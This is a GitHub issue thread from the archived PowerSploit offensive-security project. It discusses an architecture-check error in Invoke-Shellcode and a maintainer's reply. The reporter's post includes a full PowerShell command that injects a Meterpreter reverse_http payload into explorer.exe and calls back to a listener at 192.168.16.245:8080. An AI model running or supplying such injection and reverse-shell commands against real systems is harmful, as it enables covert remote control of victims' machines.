Skip to content
This repository has been archived by the owner on Jan 21, 2021. It is now read-only.

Issue with Invoke--Shellcode.ps1 #83

Closed
3gstudent opened this issue Nov 12, 2015 · 1 comment
Closed

Issue with Invoke--Shellcode.ps1 #83

3gstudent opened this issue Nov 12, 2015 · 1 comment

Comments

@3gstudent
Copy link

https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
$Proc = Get-Process explorer
Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meterpreter/reverse_http -Lhost 192.168.16.245 -Lport 8080 -Verbose

When I use the above command to inject shellcode into the running process on Windows x86
it always occurs
Unable to inject 64-bit shellcode from within 32-bit Powershell. Use the 64-bit version of Powershell if you want this to work.
I think Line337 should be
$64bitCPU = $false
and it will solve the probmlem:)

@PowerShellMafia
Copy link
Collaborator

This was an intended feature in order to prevent the execution of 32-bit msf shellcode within a 64-bit process. This check is removed in the latest version of Invoke-Shellcode in the dev branch since Metasploit integration is being removed.

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant